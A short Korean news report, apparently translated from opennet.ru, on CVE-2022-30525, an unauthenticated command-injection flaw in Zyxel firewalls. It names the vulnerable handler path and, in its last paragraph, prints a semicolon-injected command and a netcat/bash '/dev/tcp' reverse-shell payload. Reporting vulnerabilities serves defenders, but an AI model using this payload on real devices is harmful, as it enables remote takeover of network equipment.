์ธ์ฆ ์—†์ด ์ฝ”๋“œ ์‹คํ–‰์„ ํ—ˆ์šฉํ•˜๋Š” Zyxel ๋ฐฉํ™”๋ฒฝ์˜ ์ทจ์•ฝ์ 

๊ธฐ์—…์˜ ๋ฐฉํ™”๋ฒฝ, IDS ๋ฐ VPN ์ž‘๋™์„ ๊ตฌ์„ฑํ•˜๋„๋ก ์„ค๊ณ„๋œ ATP, VPN ๋ฐ USG FLEX ์‹œ๋ฆฌ์ฆˆ์˜ Zyxel ์žฅ์น˜์—์„œ ์‹ฌ๊ฐํ•œ ์ทจ์•ฝ์ (CVE-2022-30525)์ด ํ™•์ธ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฅผ ํ†ตํ•ด ์™ธ๋ถ€ ๊ณต๊ฒฉ์ž๊ฐ€ ์ปดํ“จํ„ฐ์—์„œ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ธ์ฆ ์—†์ด ์‚ฌ์šฉ์ž ๊ถŒํ•œ์ด ์—†๋Š” ์žฅ์น˜. ๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•˜๋ ค๋ฉด ๊ณต๊ฒฉ์ž๊ฐ€ HTTP/HTTPS ํ”„๋กœํ† ์ฝœ์„ ์‚ฌ์šฉํ•˜์—ฌ ์žฅ์น˜์— ์š”์ฒญ์„ ๋ณด๋‚ผ ์ˆ˜ ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. Zyxel์€ ZLD 5.30 ํŽŒ์›จ์–ด ์—…๋ฐ์ดํŠธ์˜ ์ทจ์•ฝ์„ฑ์„ ์ˆ˜์ •ํ–ˆ์Šต๋‹ˆ๋‹ค. Shodan ์„œ๋น„์Šค์— ๋”ฐ๋ฅด๋ฉด ํ˜„์žฌ ๊ธ€๋กœ๋ฒŒ ๋„คํŠธ์›Œํฌ์—๋Š” HTTP/HTTPS๋ฅผ ํ†ตํ•ด ์š”์ฒญ์„ ์ˆ˜๋ฝํ•˜๋Š” ์ž ์žฌ์ ์œผ๋กœ ์ทจ์•ฝํ•œ ์žฅ์น˜๊ฐ€ 16213๊ฐœ โ€‹โ€‹์žˆ์Šต๋‹ˆ๋‹ค.

์ธ์ฆ ์—†์ด ์•ก์„ธ์Šคํ•  ์ˆ˜ ์žˆ๋Š” ์›น ํ•ธ๋“ค๋Ÿฌ /ztp/cgi-bin/handler์— ํŠน๋ณ„ํžˆ ์„ค๊ณ„๋œ ๋ช…๋ น์„ ์ „์†กํ•˜์—ฌ ์ž‘์—…์ด ์ˆ˜ํ–‰๋ฉ๋‹ˆ๋‹ค. ์ด ๋ฌธ์ œ๋Š” lib_wan_settings.py ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ์—์„œ ์‚ฌ์šฉ๋˜๊ณ  setWanPortSt ์ž‘์—…์„ ์ฒ˜๋ฆฌํ•  ๋•Œ ์‹คํ–‰๋˜๋Š” os.system ํ˜ธ์ถœ์„ ์‚ฌ์šฉํ•˜์—ฌ ์‹œ์Šคํ…œ์—์„œ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ๋•Œ ์š”์ฒญ ๋งค๊ฐœ๋ณ€์ˆ˜๊ฐ€ ์ œ๋Œ€๋กœ ์ •๋ฆฌ๋˜์ง€ ์•Š์•„ ๋ฐœ์ƒํ•ฉ๋‹ˆ๋‹ค.

์˜ˆ๋ฅผ ๋“ค์–ด, ๊ณต๊ฒฉ์ž๋Š” ๋ฌธ์ž์—ด โ€œ; ํ•‘ 192.168.1.210;" ๊ทธ๋Ÿฌ๋ฉด ์‹œ์Šคํ…œ์—์„œ "ping 192.168.1.210" ๋ช…๋ น์ด ์‹คํ–‰๋ฉ๋‹ˆ๋‹ค. ๋ช…๋ น ์…ธ์— ์•ก์„ธ์Šคํ•˜๋ ค๋ฉด ์‹œ์Šคํ…œ์—์„œ โ€œnc -lvnp 1270โ€์„ ์‹คํ–‰ํ•œ ๋‹ค์Œ '; bash -c \ยปexec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\ยป;'.

์ถœ์ฒ˜ : opennet.ru

์ฝ”๋ฉ˜ํŠธ๋ฅผ ์ถ”๊ฐ€